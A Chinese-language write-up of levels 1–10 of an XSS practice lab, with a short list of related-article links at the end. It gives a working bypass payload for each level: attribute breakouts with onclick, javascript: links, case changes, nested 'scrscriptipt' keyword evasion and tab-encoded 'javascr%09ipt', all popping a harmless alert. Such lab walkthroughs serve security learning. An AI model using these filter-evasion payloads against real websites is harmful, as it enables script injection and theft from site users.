XSS闯关挑战1-10

1

观察页面,发现页面没什么可利用的漏洞

但是url是?传参的类型,可以试试有没有xss漏洞

复制代码
<script>alert(/xss/)</script>

2

输入1的脚本发现没效果,看一下源代码,发现传入到value后是变成了字符串的形式,咱们就让他不是字符串

复制代码
<input name=keyword  value="  "><script>alert(/xss/)</script>"  ">

3

可以看到尖括号被过滤了

我们可以试试其他的可以弹出提示框的事件

复制代码
'  onclick='alert(/xss/)

还有以下常用事件

复制代码
mouseup  鼠标释放时触发
mousedown  鼠标按下时触发
mousemove   鼠标移动时触发
mouseout     鼠标离开时触发

4

过滤掉尖括号,以及用字符串

复制代码
"  onclick="alert(/xss/)

5

发现他过滤了事件,且大写也不行

我们可以用链接

复制代码
"> <a href = 'javascript:alert(/xss/)'>click me</a>"

6

用大写

复制代码
"> <a HREF = 'javascript:alert(/xss/)'>click me</a>"

7

过滤掉了href和script

复制代码
"><scrscriptipt>alert(/xss/)</scrscriptipt>"

8

想办法绕过

这里用制表符将script隔开

复制代码
javascr%09ipt:alert(/xss/)

9

提示连接不合法

在输入中输入url

复制代码
javascr%09ipt:alert('http://www.qq.com')

10

有三个input,试着传参

只有t_sort可以传参

发现输入事件无响应

试着加个按钮,成功了

复制代码
t_sort=dd" type="button" onclick="alert(/xss/)
相关推荐
IT成长日记41 分钟前
【Docker基础】Dockerfile多阶段构建:Multi-stage Builds详解
运维·docker·容器·multi-stage·builds
deeper_wind4 小时前
keeplived双击热备配置
linux·运维·网络
技术猿188702783517 小时前
实现“micro 关键字搜索全覆盖商品”并通过 API 接口提供实时数据(一个方法)
开发语言·网络·python·深度学习·测试工具
不易思不逸7 小时前
Ubuntu20.04 RTX 4080 Nvidia驱动安装
运维·服务器
筱小虾米7 小时前
Docker配置国内镜像源
运维·docker·容器
zyhomepage8 小时前
科技的成就(六十九)
开发语言·网络·人工智能·科技·内容运营
Arva .8 小时前
HTTP常见误区
网络·网络协议·http
L_autinue_Star9 小时前
从0到1实现Shell!Linux进程程序替换详解
linux·运维·服务器·c++·chrome
Ftrans9 小时前
【分享】文件摆渡系统适配医疗场景:安全与效率兼得
大数据·运维·安全
筑梦之月9 小时前
网络安全职业指南:探索网络安全领域的各种角色
安全·web安全